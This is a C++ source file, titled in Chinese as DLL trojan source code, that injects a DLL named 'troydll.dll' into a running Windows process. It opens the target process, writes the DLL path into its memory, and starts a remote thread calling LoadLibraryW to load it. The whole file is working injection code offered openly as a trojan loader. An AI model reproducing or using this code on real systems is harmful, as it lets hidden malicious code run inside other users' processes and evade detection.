main.cpp

VC++动态链接库编程之DLL木马源代码

#include <windows.h>
#include <stdlib.h>
#include <stdio.h>

void  CheckError  ( int, int, char *);        //出错处理函数

PDWORD pdwThreadId; 
HANDLE hRemoteThread, hRemoteProcess;
DWORD  fdwCreate, dwStackSize, dwRemoteProcessId;
PWSTR  pszLibFileRemote=NULL;

void main(int argc,char **argv)
{
    int iReturnCode;
    char lpDllFullPathName[MAX_PATH];
    WCHAR pszLibFileName[MAX_PATH]={0};
	
	dwRemoteProcessId = 4000;	
	strcpy(lpDllFullPathName, "d:\\troydll.dll");
	//将DLL文件全路径的ANSI码转换成UNICODE码
	iReturnCode = MultiByteToWideChar(CP_ACP, MB_ERR_INVALID_CHARS,
		lpDllFullPathName, strlen(lpDllFullPathName),
		pszLibFileName, MAX_PATH);
	CheckError(iReturnCode, 0, "MultByteToWideChar");
    //打开远程进程
    hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | //允许创建线程 
		PROCESS_VM_OPERATION | //允许VM操作
		PROCESS_VM_WRITE,       //允许VM写
		FALSE, dwRemoteProcessId );    
    CheckError( (int) hRemoteProcess, NULL, 
		"Remote Process not Exist or Access Denied!");
    //计算DLL路径名需要的内存空间
    int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR);
    pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb, 
		MEM_COMMIT, PAGE_READWRITE);
    CheckError((int)pszLibFileRemote, NULL, "VirtualAllocEx");
    //将DLL的路径名复制到远程进程的内存空间
    iReturnCode = WriteProcessMemory(hRemoteProcess, 
        pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL);
    CheckError(iReturnCode, false, "WriteProcessMemory");
    //计算LoadLibraryW的入口地址
    PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
        GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
    CheckError((int)pfnStartAddr, NULL, "GetProcAddress");
    //启动远程线程，通过远程线程调用用户的DLL文件    
    hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0,                                                         pfnStartAddr, pszLibFileRemote, 0, NULL);
    CheckError((int)hRemoteThread, NULL, "Create Remote Thread");
    //等待远程线程退出
    WaitForSingleObject(hRemoteThread, INFINITE);
    //清场处理
    if (pszLibFileRemote != NULL)
	{
        VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
	}
    if (hRemoteThread != NULL) 
	{
		CloseHandle(hRemoteThread );
	}
    if (hRemoteProcess!= NULL) 
	{
		CloseHandle(hRemoteProcess);
	}
}

//错误处理函数CheckError()
void CheckError(int iReturnCode, int iErrorCode, char *pErrorMsg)
{
    if(iReturnCode==iErrorCode)
	{
        printf("%s Error:%d\n\n", pErrorMsg, GetLastError());
        //清场处理
        if (pszLibFileRemote != NULL)
		{   VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
        }
		if (hRemoteThread != NULL) 
		{
			CloseHandle(hRemoteThread );
		}
        if (hRemoteProcess!= NULL)
		{
			CloseHandle(hRemoteProcess);
		}
        exit(0);
    }
}